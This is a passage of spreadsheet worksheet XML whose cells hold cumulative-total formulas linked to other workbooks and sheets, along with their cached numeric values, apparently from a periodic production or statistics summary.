        <v>131.363407668558</v>
      </c>
      <c r="U7" s="198">
        <f>'[10]29'!$T$107</f>
        <v>4.875</v>
      </c>
      <c r="V7" s="198">
        <f>'[10]29'!$U$107</f>
        <v>39.8390804597701</v>
      </c>
      <c r="W7" s="198">
        <f>'[10]29'!$V$107</f>
        <v>31.7115472910927</v>
      </c>
      <c r="X7" s="198">
        <f>'[10]29'!$Q$107</f>
        <v>1.17</v>
      </c>
      <c r="Y7" s="198">
        <f>'[10]29'!$R$107</f>
        <v>277.28</v>
      </c>
      <c r="Z7" s="198">
        <f>'[10]29'!$S$107</f>
        <v>2762.71</v>
      </c>
    </row>
    <row r="8" ht="15.75" customHeight="1" spans="1:26">
      <c r="A8" s="191"/>
      <c r="B8" s="191"/>
      <c r="C8" s="201" t="s">
        <v>236</v>
      </c>
      <c r="D8" s="201"/>
      <c r="E8" s="194"/>
      <c r="F8" s="194">
        <f>'[10]29'!$D$27+'[11]29'!$D$18+'[13]29'!$D$26+'[14]29'!$D$10+'[14]29'!$D$17+'[15]29'!$D$9</f>
        <v>41879.9</v>
      </c>
      <c r="G8" s="194">
        <f>'[10]29'!$E$27+'[11]29'!$E$18+'[13]29'!$E$26+'[14]29'!$E$10+'[14]29'!$E$17+'[15]29'!$E$9</f>
        <v>2650</v>
      </c>
      <c r="H8" s="194">
        <f>G8+'28'!H8</f>
        <v>64908</v>
      </c>
      <c r="I8" s="194">
        <f>H8+yc!I8</f>
        <v>590444.99</v>
      </c>
      <c r="J8" s="194">
        <f>'[10]29'!$I$27+'[11]29'!$I$18+'[13]29'!$I$26+'[14]29'!$E$25+'[14]29'!$E$32+'[15]29'!$H$9</f>
        <v>2895.66</v>
      </c>
      <c r="K8" s="194">
        <f>J8+'28'!K8</f>
        <v>74311.82</v>
      </c>
      <c r="L8" s="194">
        <f>K8+yc!L8</f>
        <v>582056.53</v>
      </c>
      <c r="M8" s="194">
        <f>'[10]29'!$L$27+'[11]29'!$L$18+'[13]29'!$L$26+'[14]29'!$H$25+'[14]29'!$H$32+'[15]29'!$K$9</f>
        <v>32476.08</v>
      </c>
      <c r="N8" s="195"/>
      <c r="O8" s="199"/>
      <c r="P8" s="200"/>
      <c r="Q8" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R8" s="198">
        <f>'[10]29'!$W$108</f>
        <v>126.25</v>
      </c>
      <c r="S8" s="198">
        <f>'[10]29'!$X$108</f>
        <v>132.423089121472</v>
      </c>
      <c r="T8" s="198">
        <f>'[10]29'!$Y$108</f>
        <v>128.051668889199</v>
      </c>
      <c r="U8" s="198">
        <f>'[10]29'!$T$108</f>
        <v>100</v>
      </c>
      <c r="V8" s="198">
        <f>'[10]29'!$U$108</f>
        <v>45.301724137931</v>
      </c>
      <c r="W8" s="198">
        <f>'[10]29'!$V$108</f>
        <v>28.8355142332415</v>
      </c>
      <c r="X8" s="198">
        <f>'[10]29'!$Q$108</f>
        <v>24</v>
      </c>
      <c r="Y8" s="198">
        <f>'[10]29'!$R$108</f>
        <v>315.3</v>
      </c>
      <c r="Z8" s="198">
        <f>'[10]29'!$S$108</f>
        <v>2512.15</v>
      </c>
    </row>
    <row r="9" ht="15.75" customHeight="1" spans="1:26">
      <c r="A9" s="191"/>
      <c r="B9" s="191"/>
      <c r="C9" s="201" t="s">
        <v>238</v>
      </c>
      <c r="D9" s="201"/>
      <c r="E9" s="194"/>
      <c r="F9" s="194">
        <f>'[10]29'!$D$24+'[11]29'!$D$19+'[12]29'!$D$20+'[13]29'!$D$27+'[14]29'!$D$11+'[14]29'!$D$18+'[15]29'!$D$10</f>
        <v>110865.712</v>
      </c>
      <c r="G9" s="194">
        <f>'[10]29'!$E$24+'[11]29'!$E$19+'[12]29'!$E$20+'[13]29'!$E$27+'[14]29'!$E$11+'[14]29'!$E$18+'[15]29'!$E$10</f>
        <v>13419</v>
      </c>
      <c r="H9" s="194">
        <f>G9+'28'!H9</f>
        <v>434743</v>
      </c>
      <c r="I9" s="194">
        <f>H9+yc!I9</f>
        <v>4570131.88</v>
      </c>
      <c r="J9" s="194">
        <f>'[10]29'!$I$24+'[11]29'!$I$19+'[12]29'!$I$20+'[13]29'!$I$27+'[14]29'!$E$26+'[14]29'!$E$33+'[15]29'!$H$10</f>
        <v>15412.13</v>
      </c>
      <c r="K9" s="194">
        <f>J9+'28'!K9</f>
        <v>452943.194</v>
      </c>
      <c r="L9" s="194">
        <f>K9+yc!L9</f>
        <v>4550422.005</v>
      </c>
      <c r="M9" s="194">
        <f>'[10]29'!$L$24+'[11]29'!$L$19+'[12]29'!$L$20+'[13]29'!$L$27+'[14]29'!$H$26+'[14]29'!$H$33+'[15]29'!$K$10</f>
        <v>92665.518</v>
      </c>
      <c r="N9" s="195"/>
      <c r="O9" s="199"/>
      <c r="P9" s="200"/>
      <c r="Q9" s="193" t="s">
        <v>294</v>
      </c>
      <c r="R9" s="198">
        <f>'[10]29'!$W$109</f>
        <v>241.125</v>
      </c>
      <c r="S9" s="198">
        <f>'[10]29'!$X$109</f>
        <v>263.708666353236</v>
      </c>
      <c r="T9" s="198">
        <f>'[10]29'!$Y$109</f>
        <v>270.676832206318</v>
      </c>
      <c r="U9" s="198">
        <f>'[10]29'!$T$109</f>
        <v>33.3333333333333</v>
      </c>
      <c r="V9" s="198">
        <f>'[10]29'!$U$109</f>
        <v>36.6724137931034</v>
      </c>
      <c r="W9" s="198">
        <f>'[10]29'!$V$109</f>
        <v>35.0187098255279</v>
      </c>
      <c r="X9" s="198">
        <f>'[10]29'!$Q$109</f>
        <v>8</v>
      </c>
      <c r="Y9" s="198">
        <f>'[10]29'!$R$109</f>
        <v>255.24</v>
      </c>
      <c r="Z9" s="198">
        <f>'[10]29'!$S$109</f>
        <v>3050.82999999999</v>
      </c>
    </row>
    <row r="10" ht="15.75" customHeight="1" spans="1:26">
      <c r="A10" s="191"/>
      <c r="B10" s="191"/>
      <c r="C10" s="201" t="s">
        <v>295</v>
      </c>
      <c r="D10" s="201"/>
      <c r="E10" s="194"/>
      <c r="F10" s="194">
        <f>'[10]29'!$D$25+'[11]29'!$D$20+'[12]29'!$D$21+'[13]29'!$D$28+'[14]29'!$D$12+'[14]29'!$D$19+'[15]29'!$D$11</f>
        <v>61206.942</v>
      </c>
      <c r="G10" s="194">
        <f>'[10]29'!$E$25+'[11]29'!$E$20+'[12]29'!$E$21+'[13]29'!$E$28+'[14]29'!$E$12+'[14]29'!$E$19+'[15]29'!$E$11</f>
        <v>126</v>
      </c>
      <c r="H10" s="194">
        <f>G10+'28'!H10</f>
        <v>62402</v>
      </c>
      <c r="I10" s="194">
        <f>H10+yc!I10</f>
        <v>979929.17</v>
      </c>
      <c r="J10" s="194">
        <f>'[10]29'!$I$25+'[11]29'!$I$20+'[12]29'!$I$21+'[13]29'!$I$28+'[14]29'!$E$27+'[14]29'!$E$34+'[15]29'!$H$11</f>
        <v>3190.5</v>
      </c>
      <c r="K10" s="194">
        <f>J10+'28'!K10</f>
        <v>83078.84</v>
      </c>
      <c r="L10" s="194">
        <f>K10+yc!L10</f>
        <v>980307.56</v>
      </c>
      <c r="M10" s="194">
        <f>'[10]29'!$L$25+'[11]29'!$L$20+'[12]29'!$L$21+'[13]29'!$L$28+'[14]29'!$H$27+'[14]29'!$H$34+'[15]29'!$K$11</f>
        <v>40530.102</v>
      </c>
      <c r="N10" s="195"/>
      <c r="O10" s="199"/>
      <c r="P10" s="200"/>
      <c r="Q10" s="193" t="s">
        <v>296</v>
      </c>
      <c r="R10" s="198">
        <f>'[10]29'!$W$110</f>
        <v>177.694470477976</v>
      </c>
      <c r="S10" s="198">
        <f>'[10]29'!$X$110</f>
        <v>246.420678768745</v>
      </c>
      <c r="T10" s="198">
        <f>'[10]29'!$Y$110</f>
        <v>266.9672506015</v>
      </c>
      <c r="U10" s="198">
        <f>'[10]29'!$T$110</f>
        <v>44.4583333333333</v>
      </c>
      <c r="V10" s="198">
        <f>'[10]29'!$U$110</f>
        <v>36.4080459770115</v>
      </c>
      <c r="W10" s="198">
        <f>'[10]29'!$V$110</f>
        <v>34.6356749311294</v>
      </c>
      <c r="X10" s="198">
        <f>'[10]29'!$Q$110</f>
        <v>10.67</v>
      </c>
      <c r="Y10" s="198">
        <f>'[10]29'!$R$110</f>
        <v>253.4</v>
      </c>
      <c r="Z10" s="198">
        <f>'[10]29'!$S$110</f>
        <v>3017.46</v>
      </c>
    </row>
    <row r="11" ht="15.75" customHeight="1" spans="1:26">
      <c r="A11" s="191"/>
      <c r="B11" s="191"/>
      <c r="C11" s="201" t="s">
        <v>297</v>
      </c>
      <c r="D11" s="201"/>
      <c r="E11" s="194"/>
      <c r="F11" s="194">
        <f>'[10]29'!$D$26+'[11]29'!$D$21+'[12]29'!$D$19+'[13]29'!$D$29+'[14]29'!$D$13+'[14]29'!$D$20</f>
        <v>0</v>
      </c>
      <c r="G11" s="194">
        <f>'[10]29'!$E$26+'[11]29'!$E$21+'[12]29'!$E$19+'[13]29'!$E$29+'[14]29'!$E$13+'[14]29'!$E$20</f>
        <v>0</v>
      </c>
      <c r="H11" s="194">
        <f>G11+'28'!H11</f>
        <v>153.81</v>
      </c>
      <c r="I11" s="194">
        <f>H11+yc!I11</f>
        <v>153.81</v>
      </c>
      <c r="J11" s="194">
        <f>'[10]29'!$I$26+'[11]29'!$I$21+'[12]29'!$I$19+'[13]29'!$I$29+'[14]29'!$E$28+'[14]29'!$E$35</f>
        <v>0</v>
      </c>
      <c r="K11" s="194">
        <f>J11+'28'!K11</f>
        <v>0</v>
      </c>
      <c r="L11" s="194">
        <f>K11+yc!L11</f>
        <v>0</v>
      </c>
      <c r="M11" s="194">
        <f>'[10]29'!$L$26+'[11]29'!$L$21+'[12]29'!$L$19+'[13]29'!$L$29+'[14]29'!$H$28+'[14]29'!$H$35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5855.38000000002</v>
      </c>
      <c r="H12" s="194">
        <f>G12+'28'!H12</f>
        <v>214163.070000001</v>
      </c>
      <c r="I12" s="194">
        <f>H12+yc!I12</f>
        <v>5156554.32</v>
      </c>
      <c r="J12" s="194">
        <f>J22+J32+J42+J52+J62+J69</f>
        <v>19187.25</v>
      </c>
      <c r="K12" s="194">
        <f>J12+'28'!K12</f>
        <v>488471.433</v>
      </c>
      <c r="L12" s="194">
        <f>K12+yc!L12</f>
        <v>5517577.809</v>
      </c>
      <c r="M12" s="194">
        <f>M22+M32+M42+M52+M62+M69</f>
        <v>151767.952000051</v>
      </c>
      <c r="N12" s="205">
        <f>M12/439000*100</f>
        <v>34.5712874715378</v>
      </c>
      <c r="O12" s="199"/>
      <c r="P12" s="200"/>
      <c r="Q12" s="203" t="s">
        <v>299</v>
      </c>
      <c r="R12" s="204">
        <f>'[16]29'!$W$40</f>
        <v>0</v>
      </c>
      <c r="S12" s="204">
        <f>'[16]29'!$X$40</f>
        <v>0</v>
      </c>
      <c r="T12" s="204">
        <f>'[16]29'!$Y$40</f>
        <v>0</v>
      </c>
      <c r="U12" s="204">
        <f>'[16]29'!$T$40</f>
        <v>0</v>
      </c>
      <c r="V12" s="204">
        <f>'[16]29'!$U$40</f>
        <v>0</v>
      </c>
      <c r="W12" s="204">
        <f>'[16]29'!$V$40</f>
        <v>0</v>
      </c>
      <c r="X12" s="204">
        <f>'[16]29'!$Q$40</f>
        <v>0</v>
      </c>
      <c r="Y12" s="204">
        <f>'[16]29'!$R$40</f>
        <v>0</v>
      </c>
      <c r="Z12" s="204">
        <f>'[16]29'!$S$40</f>
        <v>0</v>
      </c>
    </row>
    <row r="13" ht="15.75" customHeight="1" spans="1:26">
      <c r="A13" s="191"/>
      <c r="B13" s="193"/>
      <c r="C13" s="193"/>
      <c r="D13" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E13" s="194">
        <f>E23+E33+E43+E53+E63+E70</f>
        <v>0</v>
      </c>
      <c r="F13" s="194">
        <f>F23+F33+F43+F53+F63+F70</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="G13" s="194">
        <f>G23+G33+G43+G53+G63+G70</f>
        <v>0</v>
      </c>
      <c r="H13" s="194">
        <f>G13+'28'!H13</f>
        <v>0</v>
      </c>
      <c r="I13" s="194">
        <f>H13+yc!I13</f>
        <v>0</v>
      </c>
      <c r="J13" s="194">
        <f>J23+J33+J43+J53+J63+J70</f>
        <v>0</v>
      </c>
      <c r="K13" s="194">
        <f>J13+'28'!K13</f>
        <v>0</v>
      </c>
      <c r="L13" s="194">
        <f>K13+yc!L13</f>
        <v>0</v>
      </c>
      <c r="M13" s="194">
        <f>M23+M33+M43+M53+M63+M70</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="N13" s="207">
        <f>(M12+M13)/(315000+80000+150000)*100</f>
        <v>27.8473306422111</v>
      </c>
      <c r="O13" s="199"/>
      <c r="P13" s="208" t="s">
        <v>237</v>
      </c>
      <c r="Q13" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R13" s="209">
        <f>'[11]29'!$W$68</f>
        <v>0</v>
      </c>
      <c r="S13" s="209">
        <f>'[11]29'!$X$68</f>
        <v>263.636596158273</v>
      </c>
      <c r="T13" s="209">
        <f>'[11]29'!$Y$68</f>
        <v>266.206969721701</v>
      </c>
      <c r="U13" s="209">
        <f>'[11]29'!$T$68</f>
        <v>0</v>
      </c>
      <c r="V13" s="209">
        <f>'[11]29'!$U$68</f>
        <v>56.1738505747126</v>
      </c>
      <c r="W13" s="209">
        <f>'[11]29'!$V$68</f>
        <v>70.3225436179982</v>
      </c>
      <c r="X13" s="210" t="str">
        <f>'[11]29'!$Q$68</f>
        <v>0.00</v>
      </c>
      <c r="Y13" s="210" t="str">
        <f>'[11]29'!$R$68</f>
        <v>390.97</v>
      </c>
      <c r="Z13" s="210" t="str">
        <f>'[11]29'!$S$68</f>
        <v>6126.50</v>
      </c>
    </row>
    <row r="14" ht="15.75" customHeight="1" spans="1:26">
      <c r="A14" s="191"/>
      <c r="B14" s="193"/>
      <c r="C14" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D14" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E14" s="194">
        <f>E24+E34+E44+E54</f>
        <v>0</v>
      </c>
      <c r="F14" s="194">
        <f>F24+F34+F44+F54</f>
        <v>0</v>
      </c>
      <c r="G14" s="194">
        <f>G24+G34+G44+G54+G62</f>
        <v>670</v>
      </c>
      <c r="H14" s="194">
        <f>G14+'28'!H14</f>
        <v>76581</v>
      </c>
      <c r="I14" s="194">
        <f>H14+yc!I14</f>
        <v>1041124.676</v>
      </c>
      <c r="J14" s="194">
        <f>J24+J34+J44+J54+J62</f>
        <v>8531.96</v>
      </c>
      <c r="K14" s="194">
        <f>J14+'28'!K14</f>
        <v>162387.985</v>
      </c>
      <c r="L14" s="194">
        <f>K14+yc!L14</f>
        <v>1955332.091</v>
      </c>
      <c r="M14" s="194">
        <f>M24+M34+M44+M54</f>
        <v>52110.78</v>
      </c>
      <c r="N14" s="211"/>
      <c r="O14" s="199"/>
      <c r="P14" s="208"/>
      <c r="Q14" s="193" t="s">
        <v>239</v>
      </c>
      <c r="R14" s="209">
        <f>'[11]29'!$W$71</f>
        <v>251.740696278511</v>
      </c>
      <c r="S14" s="209">
        <f>'[11]29'!$X$71</f>
        <v>222.28464982123</v>
      </c>
      <c r="T14" s="209">
        <f>'[11]29'!$Y$71</f>
        <v>214.1711570356</v>
      </c>
      <c r="U14" s="209">
        <f>'[11]29'!$T$71</f>
        <v>34.7083333333333</v>
      </c>
      <c r="V14" s="209">
        <f>'[11]29'!$U$71</f>
        <v>47.8204022988506</v>
      </c>
      <c r="W14" s="209">
        <f>'[11]29'!$V$71</f>
        <v>50.0382231404959</v>
      </c>
      <c r="X14" s="210" t="str">
        <f>'[11]29'!$Q$71</f>
        <v>8.33</v>
      </c>
      <c r="Y14" s="210" t="str">
        <f>'[11]29'!$R$71</f>
        <v>332.83</v>
      </c>
      <c r="Z14" s="210" t="str">
        <f>'[11]29'!$S$71</f>
        <v>4359.33</v>
      </c>
    </row>
    <row r="15" ht="15.75" customHeight="1" spans="1:26">
      <c r="A15" s="191"/>
      <c r="B15" s="193"/>
      <c r="C15" s="193"/>
      <c r="D15" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E15" s="194">
        <f>E25+E35+E45+E55</f>
        <v>0</v>
      </c>
      <c r="F15" s="194">
        <f>F25+F35+F45+F55</f>
        <v>0</v>
      </c>
      <c r="G15" s="194">
        <f>G25+G35+G45+G55</f>
        <v>0</v>
      </c>
      <c r="H15" s="194">
        <f>G15+'28'!H15</f>
        <v>0</v>
      </c>
      <c r="I15" s="194">
        <f>H15+yc!I15</f>
        <v>0</v>
      </c>
      <c r="J15" s="194">
        <f>J25+J35+J45+J55</f>
        <v>136.779999999999</v>
      </c>
      <c r="K15" s="194">
        <f>J15+'28'!K15</f>
        <v>9011.948</v>
      </c>
      <c r="L15" s="194">
        <f>K15+yc!L15</f>
        <v>123768.448</v>
      </c>
      <c r="M15" s="194"/>
      <c r="N15" s="212"/>
      <c r="O15" s="199"/>
      <c r="P15" s="208"/>
      <c r="Q15" s="193" t="s">
        <v>241</v>
      </c>
      <c r="R15" s="209">
        <f>'[11]29'!$W$72</f>
        <v>59.8925693822739</v>
      </c>
      <c r="S15" s="209">
        <f>'[11]29'!$X$72</f>
        <v>62.8890766131652</v>
      </c>
      <c r="T15" s="209">
        <f>'[11]29'!$Y$72</f>
        <v>61.4478043870318</v>
      </c>
      <c r="U15" s="209">
        <f>'[11]29'!$T$72</f>
        <v>46.5416666666667</v>
      </c>
      <c r="V15" s="209">
        <f>'[11]29'!$U$72</f>
        <v>66.3318965517241</v>
      </c>
      <c r="W15" s="209">
        <f>'[11]29'!$V$72</f>
        <v>51.9991965105602</v>
      </c>
      <c r="X15" s="210" t="str">
        <f>'[11]29'!$Q$72</f>
        <v>11.17</v>
      </c>
      <c r="Y15" s="210" t="str">
        <f>'[11]29'!$R$72</f>
        <v>461.67</v>
      </c>
      <c r="Z15" s="210" t="str">
        <f>'[11]29'!$S$72</f>
        <v>4530.17</v>
      </c>
    </row>
    <row r="16" ht="15.75" customHeight="1" spans="1:26">
      <c r="A16" s="191"/>
      <c r="B16" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C16" s="193"/>
      <c r="D16" s="193"/>
      <c r="E16" s="194">
        <f>E26+E36+E46+E56+E64+E71</f>
        <v>0</v>
      </c>
      <c r="F16" s="194"/>
      <c r="G16" s="194">
        <f>G26+G36+G46+G56+G64+G71</f>
        <v>0</v>
      </c>
      <c r="H16" s="194">
        <f>G16+'28'!H16</f>
        <v>0</v>
      </c>
      <c r="I16" s="194">
        <f>H16+yc!I16</f>
        <v>0</v>
      </c>
      <c r="J16" s="194">
        <f>J26+J36+J46+J56+J64+J71+J75</f>
        <v>0</v>
      </c>
      <c r="K16" s="194">
        <f>J16+'28'!K16</f>
        <v>0</v>
      </c>
      <c r="L16" s="194">
        <f>K16+yc!L16</f>
        <v>0</v>
      </c>
      <c r="M16" s="194"/>
      <c r="N16" s="195"/>
      <c r="O16" s="199"/>
      <c r="P16" s="208"/>
      <c r="Q16" s="193" t="s">
        <v>243</v>
      </c>
      <c r="R16" s="209">
        <f>'[11]29'!$W$73</f>
        <v>64.7269471799463</v>
      </c>
      <c r="S16" s="209">
        <f>'[11]29'!$X$73</f>
        <v>60.9500822350855</v>
      </c>
      <c r="T16" s="209">
        <f>'[11]29'!$Y$73</f>
        <v>62.7194289487563</v>
      </c>
      <c r="U16" s="209">
        <f>'[11]29'!$T$73</f>
        <v>46.5416666666667</v>
      </c>
      <c r="V16" s="209">
        <f>'[11]29'!$U$73</f>
        <v>67.2658045977011</v>
      </c>
      <c r="W16" s="209">
        <f>'[11]29'!$V$73</f>
        <v>53.5397153351699</v>
      </c>
      <c r="X16" s="210" t="str">
        <f>'[11]29'!$Q$73</f>
        <v>11.17</v>
      </c>
      <c r="Y16" s="210" t="str">
        <f>'[11]29'!$R$73</f>
        <v>468.17</v>
      </c>
      <c r="Z16" s="210" t="str">
        <f>'[11]29'!$S$73</f>
        <v>4664.38</v>
      </c>
    </row>
    <row r="17" ht="15.75" customHeight="1" spans="1:26">
      <c r="A17" s="191"/>
      <c r="B17" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C17" s="193"/>
      <c r="D17" s="193"/>
      <c r="E17" s="194">
        <f>E27+E37+E47+E57+E65+E72+E83</f>
        <v>650000</v>
      </c>
      <c r="F17" s="194"/>
      <c r="G17" s="194">
        <f>G27+G37+G47+G57+G65+G72</f>
        <v>0</v>
      </c>
      <c r="H17" s="194">
        <f>G17+'28'!H17</f>
        <v>0</v>
      </c>
      <c r="I17" s="194">
        <f>H17+yc!I17</f>
        <v>0</v>
      </c>
      <c r="J17" s="194">
        <f>J27+J37+J47+J57+J65+J72+J76</f>
        <v>0</v>
      </c>
      <c r="K17" s="194">
        <f>J17+'28'!K17</f>
        <v>0</v>
      </c>
      <c r="L17" s="194">
        <f>K17+yc!L17</f>
        <v>0</v>
      </c>
      <c r="M17" s="194"/>
      <c r="N17" s="195"/>
      <c r="O17" s="199"/>
      <c r="P17" s="213" t="s">
        <v>252</v>
      </c>
      <c r="Q17" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R17" s="209">
        <f>'[12]29'!$W$71</f>
        <v>0</v>
      </c>
      <c r="S17" s="209">
        <f>'[12]29'!$X$71</f>
        <v>0</v>
      </c>
      <c r="T17" s="209">
        <f>'[12]29'!$Y$71</f>
        <v>0</v>
      </c>
      <c r="U17" s="209">
        <f>'[12]29'!$T$71</f>
        <v>0</v>
      </c>
      <c r="V17" s="209">
        <f>'[12]29'!$U$71</f>
        <v>0</v>
      </c>
      <c r="W17" s="209">
        <f>'[12]29'!$V$71</f>
        <v>0</v>
      </c>
      <c r="X17" s="209">
        <f>'[12]29'!$Q$71</f>
        <v>0</v>
      </c>
      <c r="Y17" s="209">
        <f>'[12]29'!$R$71</f>
        <v>0</v>
      </c>
      <c r="Z17" s="209">
        <f>'[12]29'!$S$71</f>
        <v>0</v>
      </c>
    </row>
    <row r="18" ht="15.75" customHeight="1" spans="1:26">
      <c r="A18" s="191"/>
      <c r="B18" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C18" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D18" s="193"/>
      <c r="E18" s="194">
        <f>E28+E38+E48+E58+E66+E73</f>
        <v>0</v>
      </c>
      <c r="F18" s="194"/>
      <c r="G18" s="194">
        <f>G28+G38+G48+G58+G66+G73</f>
        <v>0</v>
      </c>
      <c r="H18" s="194">
        <f>G18+'28'!H18</f>
        <v>0</v>
      </c>
      <c r="I18" s="194">
        <f>H18+yc!I18</f>
        <v>0</v>
      </c>
      <c r="J18" s="194">
        <f>J28+J38+J48+J58+J66+J73</f>
        <v>0</v>
      </c>
      <c r="K18" s="194">
        <f>J18+'28'!K18</f>
        <v>0</v>
      </c>
      <c r="L18" s="194">
        <f>K18+yc!L18</f>
        <v>0</v>
      </c>
      <c r="M18" s="194"/>
      <c r="N18" s="195"/>
      <c r="O18" s="199"/>
      <c r="P18" s="214"/>
      <c r="Q18" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R18" s="209">
        <f>'[12]29'!$W$74</f>
        <v>0</v>
      </c>
      <c r="S18" s="209">
        <f>'[12]29'!$X$74</f>
        <v>217.79347826087</v>
      </c>
      <c r="T18" s="209">
        <f>'[12]29'!$Y$74</f>
        <v>221.756151270014</v>
      </c>
      <c r="U18" s="209">
        <f>'[12]29'!$T$74</f>
        <v>0</v>
      </c>
      <c r="V18" s="209">
        <f>'[12]29'!$U$74</f>
        <v>13.2183908045977</v>
      </c>
      <c r="W18" s="209">
        <f>'[12]29'!$V$74</f>
        <v>7.50608356290174</v>
      </c>
      <c r="X18" s="209">
        <f>'[12]29'!$Q$74</f>
        <v>0</v>
      </c>
      <c r="Y18" s="209">
        <f>'[12]29'!$R$74</f>
        <v>92</v>
      </c>
      <c r="Z18" s="209">
        <f>'[12]29'!$S$74</f>
        <v>653.93</v>
      </c>
    </row>
    <row r="19" ht="15.75" customHeight="1" spans="1:26">
      <c r="A19" s="191"/>
      <c r="B19" s="191"/>
      <c r="C19" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D19" s="193"/>
      <c r="E19" s="194">
        <f>E29+E39+E49+E59+E67+E74</f>
        <v>0</v>
      </c>
      <c r="F19" s="194"/>
      <c r="G19" s="194">
        <f>G29+G39+G49+G59+G67+G74</f>
        <v>0</v>
      </c>
      <c r="H19" s="194">
        <f>G19+'28'!H19</f>
        <v>0</v>
      </c>
      <c r="I19" s="194">
        <f>H19+yc!I19</f>
        <v>0</v>
      </c>
      <c r="J19" s="194">
        <f>J29+J39+J49+J59+J67+J74+J78</f>
        <v>0</v>
      </c>
      <c r="K19" s="194">
        <f>J19+'28'!K19</f>
        <v>0</v>
      </c>
      <c r="L19" s="194">
        <f>K19+yc!L19</f>
        <v>0</v>
      </c>
      <c r="M19" s="194"/>
      <c r="N19" s="195"/>
      <c r="O19" s="199"/>
      <c r="P19" s="213" t="s">
        <v>304</v>
      </c>
      <c r="Q19" s="193" t="s">
        <v>291</v>
      </c>
      <c r="R19" s="209">
        <f>'[13]29'!$W$72</f>
        <v>1e-5</v>
      </c>
      <c r="S19" s="209">
        <f>'[13]29'!$X$72</f>
        <v>1e-5</v>
      </c>
      <c r="T19" s="209">
        <f>'[13]29'!$Y$72</f>
        <v>9.16216216216216e-6</v>
      </c>
      <c r="U19" s="209">
        <f>'[13]29'!$T$72</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="V19" s="209">
        <f>'[13]29'!$U$72</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="W19" s="209">
        <f>'[13]29'!$V$72</f>
        <v>4.24701561065197e-6</v>
      </c>
      <c r="X19" s="209">
        <f>'[13]29'!$Q$72</f>
        <v>1e-6</v>
      </c>
      <c r="Y19" s="209">
        <f>'[13]29'!$R$72</f>
        <v>2.9e-5</v>
      </c>
      <c r="Z19" s="209">
        <f>'[13]29'!$S$72</f>
        <v>0.00037</v>
      </c>
    </row>
    <row r="20" ht="15.75" customHeight="1" spans="1:26">
      <c r="A20" s="191"/>
      <c r="B20" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C20" s="193"/>
      <c r="D20" s="193"/>
      <c r="E20" s="194">
        <f>E30+E40+E50+E60</f>
        <v>0</v>
      </c>
      <c r="F20" s="194"/>
      <c r="G20" s="194">
        <f>G30+G40+G50+G60</f>
        <v>0</v>
      </c>
      <c r="H20" s="194">
        <f>G20+'28'!H20</f>
        <v>0</v>
      </c>
      <c r="I20" s="194">
        <f>H20+yc!I20</f>
        <v>0</v>
      </c>
      <c r="J20" s="194">
        <f>J30+J40+J50+J60</f>
        <v>0</v>
      </c>
      <c r="K20" s="194">
        <f>J20+'28'!K20</f>
        <v>0</v>
      </c>
      <c r="L20" s="194">
        <f>K20+yc!L20</f>
        <v>0</v>
      </c>
      <c r="M20" s="194"/>
      <c r="N20" s="195"/>
      <c r="O20" s="199"/>
      <c r="P20" s="215"/>
      <c r="Q20" s="193" t="s">
        <v>292</v>
      </c>
      <c r="R20" s="209">
        <f>'[13]29'!$W$73</f>
        <v>243.974156501077</v>
      </c>
      <c r="S20" s="209">
        <f>'[13]29'!$X$73</f>
        <v>207.041443272192</v>
      </c>
      <c r="T20" s="209">
        <f>'[13]29'!$Y$73</f>
        <v>238.045533297065</v>
      </c>
      <c r="U20" s="209">
        <f>'[13]29'!$T$73</f>
        <v>100.000004166667</v>
      </c>
      <c r="V20" s="209">
        <f>'[13]29'!$U$73</f>
        <v>33.6077627873563</v>
      </c>
      <c r="W20" s="209">
        <f>'[13]29'!$V$73</f>
        <v>69.0500501606979</v>
      </c>
      <c r="X20" s="209">
        <f>'[13]29'!$Q$73</f>
        <v>24.000001</v>
      </c>
      <c r="Y20" s="209">
        <f>'[13]29'!$R$73</f>
        <v>233.910029</v>
      </c>
      <c r="Z20" s="209">
        <f>'[13]29'!$S$73</f>
        <v>6015.64037</v>
      </c>
    </row>
    <row r="21" ht="15.75" customHeight="1" spans="1:26">
      <c r="A21" s="191" t="s">
        <v>229</v>
      </c>
      <c r="B21" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C21" s="193"/>
      <c r="D21" s="193"/>
      <c r="E21" s="194">
        <v>190000</v>
      </c>
      <c r="F21" s="194">
        <f>'[10]29'!$D$22</f>
        <v>83053.31</v>
      </c>
      <c r="G21" s="194">
        <f>'[10]29'!$E$22</f>
        <v>6981</v>
      </c>
      <c r="H21" s="194">
        <f>G21+'28'!H21</f>
        <v>206518</v>
      </c>
      <c r="I21" s="194">
        <f>H21+yc!I21</f>
        <v>2315956</v>
      </c>
      <c r="J21" s="194">
        <f>'[10]29'!$I$22</f>
        <v>8723.64</v>
      </c>
      <c r="K21" s="194">
        <f>J21+'28'!K21</f>
        <v>233015.89</v>
      </c>
      <c r="L21" s="194">
        <f>K21+yc!L21</f>
        <v>2299469.89</v>
      </c>
      <c r="M21" s="194">
        <f>'[10]29'!$L$22</f>
        <v>56555.42</v>
      </c>
      <c r="N21" s="195">
        <f>M21/47000*100</f>
        <v>120.330680851064</v>
      </c>
      <c r="O21" s="199"/>
      <c r="P21" s="215"/>
      <c r="Q21" s="193" t="s">
        <v>294</v>
      </c>
      <c r="R21" s="209">
        <f>'[13]29'!$W$81</f>
        <v>258.354224634287</v>
      </c>
      <c r="S21" s="209">
        <f>'[13]29'!$X$81</f>
        <v>277.653122197925</v>
      </c>
      <c r="T21" s="209">
        <f>'[13]29'!$Y$81</f>
        <v>275.828809288507</v>
      </c>
      <c r="U21" s="209">
        <f>'[13]29'!$T$81</f>
        <v>42.0127314814815</v>
      </c>
